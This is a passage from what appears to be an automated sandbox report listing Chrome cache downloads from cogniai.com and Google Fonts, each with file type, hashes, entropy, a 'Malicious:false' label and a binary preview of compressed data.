                                                                                                                SHA-512:E5560C029D2F53DF5A368159C27B6972FDADE429B5AE8096A20C65650A27CECB8597E4DDFA849BB80E6D1586B4B2493D0B7DD00311AB2990E037892931B7D3F5
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/themes/techze/js/odometer.min.js?ver=1
                                                                                                                Preview:...........[{W....~...-.DLx..9...o....v.'D.A.....~...y.:.fI...zWuf{s}-....:.55_.W.6..Kr.c+.$.<..5C1.K..Gq..2P<.^.*.2R.J.L..e..P.+...P.._.......Pi+Gz..?.=.i<../..1^.|c6.3..G.;../.4..U.-.z.....C0|v....if7.{.e.H.Q.. .^..?..&..."....D.1...4.......R...nS.[nJ...%;'..?..O/......b..U........P.....P.=.N...#q9c{..1.^.-.;.X...4.Q.u;..#g..c.............L.......|...5.[%#.....|.p.F.I...v.:.sg...A.lO....*f....8.._3.}8.......4g.....y.N...V..[..M.lL.p>....g.b.>..;?.a.yk.......7.1.W1.....3+.....3.:....yZ.q.......y].393?...D..A...X.f.\FZ{.C.(......|S..#}.@.....tl.o....[...\sV5..z..w.q)C.8......!/d......Gd..l4..|...c..k.2O...25.!.\2#u.8S7.........H..]..'N..q..d.....4.9.....MY$..W.....nnl..H7....... ?..$Mel..0.....T2p..ur.....o.^.e.P.5.l..x>..M..7%.h...`.[...H....<V4<WZomlp......;.g..,..@.3.e...j.."........T.B........0s9...%..|6H..{[ZB.w.=.N.`,!^.X.F]7...u........lNnZ.(v...!tc2.%Z...>.3........E 6...)...&K.2s.o.....@.F......k...a.."3

                                                                                                                Chrome Cache Entry: 295

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 115750
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):30757
                                                                                                                Entropy (8bit):7.986588330549367
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:MlFGFP+nvlZjXoPg1xw6kK06D+HbAtCwumHpON:MlEFPEjKgIb6DcfmHMN
                                                                                                                MD5:DAEF901D9EB7F55896C9EF7C8F6E0D64
                                                                                                                SHA1:54C655A8EC4FF9B0AAC7B448FC6D91C519045173
                                                                                                                SHA-256:CC1386692C8BA773D30B4367DC70C5CEE9D54D23B4DB0AEA7D7387420C4CB32A
                                                                                                                SHA-512:E3CEA1A98EB3E0CE2A4030300C8AA8288BE2D197B78A487973BB223E072D1A1B391DFBAAD3EAEA00D7402AC82CD86D6E058A50AC0ECE9003E80F8722F7E85EB2
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=BIZ+UDPMincho&display=swap
                                                                                                                Preview:............-.q..|....V..<.6..h@.4Z.Hh. ..Q,.&T]......O."k.....1...0....>....O...W.....//.X....O`.}.....................~.7..?....W......ow.t}....|.)9.vo.....k..?..u...W....../_~....E..o............?............?...................\.........s....O?..w..........o.!.........o.......O?.w.K....._....._j(......^~...m........_....).Ea'...p..BqnQ.Bq..}.!..eP..VN!&.I..R/....i..p.`.B.).N.!...Gn.......M....j..........O...]^t=.Uw...M!..k..E..z.^j.B.....k...B....Pku4R.s'.U.mR.v...x.3>...O]qQ.Lm.>u..|=#..Y.z...Aa..6....(....Y...r........^t=k...r.cO.)@.....]...B..>l..,.Fb..z.......O.:...x^gY..Hm.bm?.n.W..........F........=.z../[...uZ.>......2w......G=}..&..._0m...S..,..(.....E..:....M....>..g^#..#.....N..".....i.<..u&8kz.H.+.0...L...(.k}...[.?......Y.S.=5....S}=?...(..gC...;Y.|.t..LH.B... f...S.).d...C....SX.b|.O;....S...6...b1.........xZ.O..im>?.=Uw?........=#.!..>....Q.....+........i.??m.....O.w.._...>...?....c.x.[..O....M.4..l

                                                                                                                Chrome Cache Entry: 296

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 18926
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):8005
                                                                                                                Entropy (8bit):7.971002211097923
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:kiBsm6hBJR/30VDrdxDfJNQHNNbWQ41n/x00sCbAF:kiqm6hBLPKt7NKBOWZl
                                                                                                                MD5:58444FD2891FA94BC86DC06966A88A38
                                                                                                                SHA1:2A86FB34BEB734B3DBA9331A225F9A4BFADDEAD8
                                                                                                                SHA-256:A47A2C4D3E8ACE98BB8B8768F63B20098A96903EB008815DD3E4052CF086E0B6
                                                                                                                SHA-512:9CDEBB4B0FA33CC6B5C0433E6567FB062ACA15F53D3801431F4861EEF499BC9A77C1A9DCE65811D8CF467983CDDA794BD2106040F9D39B9958210262051927FA
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.8
                                                                                                                Preview:...........\{w...*X7cP,0.m.......Mb<.zl!...HD.~.a?....%..;;w..='.H....wU.....'e..L....)-...(..f.=4.A.....l.rL...E..".*F....3..$..)..F.&~...rg.\.\.rLw.l..[..7-.M".....C....'.1...s.V..... .L.D.c....G..1YX>p....".^8.....,.?SO...e..&...._.....8z.).4]^.-.00.\....".,../..>......Y..).s.Zp=k4....?.b.5.#.....6DFT..ddZ,......2.?.76]M.(j.<...d..MM.+..Z....F(..0.?.XN...|...4T.V..i.eX.~b9..h7"..@..fA8.o..0<p.`.6...uo.0...tg.....y...fr...py\..|..@..5....]kO.i.?bas...,..4..RH..#,.8a..a 63l.....,x..."?.1P..l...Y.....4.&.....f.y.a....@.#.......;]...J........bg.. .....(gj.2.z.4bQ....i.....D.MKc.=.]/j...6....}..9.KM[+.......8.=.W..?...._..6o4EQ..... .h......l*.A..yFF.@.:..ri..c'..SH.-.J.IS...-....*..mX...O..7.s2.........i...[.bAWh......X..)...I...q......9>.h..].1g.xOi.=`v..D@.4.-....kj....8...bA....F...Z....3`.I.....1.;...XA.iN<...5.".Ss..X..d......G.3.f....b...i...G&...i..).F..Qa.0G{".?....~.<............#..K.=.N.:....Q*.I+..r...z.....a3..0M..+..

                                                                                                                Chrome Cache Entry: 297

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 10592
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):5007
                                                                                                                Entropy (8bit):7.959708556789666
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:20MRBXgnPNiA4otWrfRkF/l/GDRMcYm6eEjTIWifhFM5q2iC+oWflep/v:0INihgap69sfijTEZFM5qLoale1v
                                                                                                                MD5:966B4C0314FDB4C6DB423BB83D351DC2
                                                                                                                SHA1:1E176959788DF247E8F138B9B3BC7EBC3DAF8213
                                                                                                                SHA-256:717E78049BFF1F194AE0852DBAFDC7B805BF0822C29E452870D98F95FDE649CA
                                                                                                                SHA-512:DE3D25A862B6E2F39ADF745EC9C4848626A613C0CC9C6A2256C0A990EAC3F86A4FC3628D1966DA47461878C79F8BE1E02141B7DB7E765A2D3B662BED8061C2E4
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/themes/techze/js/scripts.js?ver=1
                                                                                                                Preview:...........ZyS.X.....Hs{L.DMXc3...D..3.. !A........9'aq.y.n..T...9..CK.<r.a...'Y..A.>In...^..{S.r_.5.....|...d:t.\.......}.q....^b...,....G..Cg$*.....#...0.....'.5.l..B7.......L.-.....I0..{..r.... ...0.B.I<.O.).A...+.,.`%.T..S._..$m...fI<....5.S/.O#....%x.....p.;.T5..P.\..\_....w..'I.{sB...8IEp...c......&/./BN.6.)....e...........m..'\._.2FH........2.@...A.I<...o../...4.z...;...y......c...X.L.."s.f].$...89.nz.+...s..Ch...Hm@..X.<..J."_^.C...9/v...v...lc.|>..I.....\|h....}AJ..X..?..F...#$/./.7.b{.....s..H.!..e.DQ.~.T.&...&oo2...^.<...:r..D..<..q......6.....Y...z6.)qE..gW^ILr..Df:Q...B...h....0.8(.Kn;...n2.".(r*,...6..Z....#.C.`Y8..>.M.............O....`.x....*.SP....U.4UUI34.O.,....<. ......N...|#..G_.,6..7...8.un.tv.X.....f .S..\...kc}..`C.....L..%p..).vm....1.3'g...x..4...QP.....3..I.026s.*.S..o.#a...P...#...K..Y.....B....d&`o./`..[..x.....Jx.."....yU.}...EPS......}....|.8n..v.0...h....I..-..o..5....X0-..Cm.7Cg....H.7..z.0TJ

                                                                                                                Chrome Cache Entry: 298

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 1243
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):466
                                                                                                                Entropy (8bit):7.507087898448223
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:X/aPccBDt6OyU34sNRuzprugY6xOrwSY9okieqAh:XiZt6OKeorFY6Cwi3a
                                                                                                                MD5:BD288FA8F62AF02B46FEEAB76830DFBE
                                                                                                                SHA1:48B369ECEA5948547F0A1C9DE61DDE674B4FE8A3
                                                                                                                SHA-256:2662FA1A6855070833DE0193889C61E03FAB4855CED841E1C5DE14DF1F45E6D6
                                                                                                                SHA-512:7EBE743CB8F986B41A5D8276CCB18F980D46DFAA89E7234E3F90E1D7D8F6614361C4DE168CF28615DB2DCBE6A73EC4A3382B0C1BB74A8FD39D05F4A7D28B9FB4
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Gemunu+Libre&display=swap
                                                                                                                Preview:............n.0.@.......H.b.R...6.j.M...Y.l...j.c...rK.S.\s..q..<..@_7.B.`.&....`U..<O..t..9...y...|....^....d...;..u.$..~H@....C..U.w.O....]...S..a8..B........r^....=U.C.#Y.M...v..........?....6_.b.W...../|.2YmV.S[U.R_A_p..Z.^...........'.}..(.zX|4....\.....D.1.z.....$!9.z.........h.|..[S...J0..f.m*...:LYl.y.5...7eBX.p..ti....g......A5...S.b...4..50.!$..E...vY.S..X....;..2.~.Lldb/......z.....~..y.^?g.SJ...G^\....=.$>:]:........F._........z^.....

                                                                                                                Chrome Cache Entry: 299

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 1303
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):475
                                                                                                                Entropy (8bit):7.5116234561739725
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:X/aPsCTYQZ3uF7UFMed5x6UCnFW8IvQiHmUdhjTjUDRpDn77/:XiXTY2/FMe5CFcvzHddh/jUtN/
                                                                                                                MD5:0958D7D0B37CB77105155F8D95016CC0
                                                                                                                SHA1:A33961BE2D5DDAC6EDC38F54756E2974B767CC14
                                                                                                                SHA-256:6BD8DC2C5591CB4D64ADF1076A4EA68C06D70BCC42451786C15B65C8ED578FE3
                                                                                                                SHA-512:0EB501260525CECAC950F8F802F48DA678DFC2AC8480A7A7358EFA5AEB78525E701173F6CA5C8F1177E8217C1A0E0B58188B856E1F46AB48138B3A57476F8391
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Quicksand&display=swap
                                                                                                                Preview:............n.0.@.........K..E..z.`eY!..5i+I...)...R.=....<._...u/.Z.h...l.^{[Q....!.N.....:..N.~3.:.~h......yu.es........j...F.bgW.J.a.^.j.S...2.l..ZV.j.|..<m..Y...7...7.>.et.c.9...=F..8.p}l.>F.:.Q..r..[zi67G.....v.C/.aS{{.7..__a..g>..... ......A`!.HmY.e)7....6........,...2....4$%...4..=...j.8z.../...?f.4K.y.0......4P...[.9..,.....1)2..X(c.N...lP.V.g....r.!d.I..T...[.R.!.|)..76...[..|...fm.....Z>..@#X/...=...Jsg.R.c..Y2...-...s^XW.........6......

                                                                                                                Chrome Cache Entry: 300

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 2508 x 816, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):80440
                                                                                                                Entropy (8bit):7.8341033255320225
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:CscB5J4cozH3y8/95TGjZ19ZTyOxH4h7cxR1MhgbkVJnKWLCEVgFNVq02:htcuhF5UjyOxHs7sMLezQ
                                                                                                                MD5:9927B50D8AF7749EE51196B0FAC9A07C
                                                                                                                SHA1:3287A9009312159ABEE016A4745E1E60C89B801C
                                                                                                                SHA-256:2120F80D2D3ADEE5F068AD3411A511DE8AD9782478B76B77E86A6A06DAB5A848
                                                                                                                SHA-512:4A336859737C61EBE722D017981E597426DA1F19AED4F91F387174C0F25B19B7B11F020873A87B7011E15573C43C13C71D70EF273AD8A4F26F27E72457130C7E
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2023/11/google-lo